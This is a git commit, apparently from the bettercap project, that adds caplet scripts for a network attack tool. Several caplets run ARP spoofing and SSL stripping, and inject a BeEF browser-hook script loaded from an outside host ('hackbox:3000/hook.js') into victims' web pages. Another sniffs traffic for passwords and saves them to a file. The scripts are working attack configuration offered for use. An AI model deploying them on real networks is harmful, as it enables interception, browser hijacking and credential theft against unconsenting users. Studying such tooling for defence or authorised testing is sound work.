Fixed compilation

This commit is contained in:
evilsocket 2018-01-07 16:38:34 +01:00
commit f992cb50f2
22 changed files with 100 additions and 29 deletions

5
caplets/active_recon.cap Normal file
View file

@ -0,0 +1,5 @@
net.probe on
net.recon on
sleep 5
net.show
quit

21
caplets/beef_active.cap Normal file
View file

@ -0,0 +1,21 @@
# spoof everyone as they're discovered
# set arp.spoof.targets 192.168.1.0/24
# strip down https links when possible
set http.proxy.sslstrip true
# inject beef hook
set http.proxy.post.filter |</head>|<script type="text/javascript" src="http://hackbox:3000/hook.js"></script></head>|
# keep searching for new targets
# net.probe on
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
sleep 5
# start arp spoofing attack
arp.spoof on

19
caplets/beef_passive.cap Normal file
View file

@ -0,0 +1,19 @@
# strip down https links when possible
set http.proxy.sslstrip true
# inject beef hook
set http.proxy.post.filter |</head>|<script type="text/javascript" src="http://hackbox:3000/hook.js"></script></head>|
#
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
active

View file

@ -0,0 +1,4 @@
net.recon on
sleep 1
net.show
quit

View file

@ -0,0 +1,13 @@
# keep reading arp table for network mapping
net.recon on
set net.sniffer.regexp .*password=.+
set net.sniffer.output passwords.cap
# start arp spoofing attack
# arp.spoof on
net.sniffer on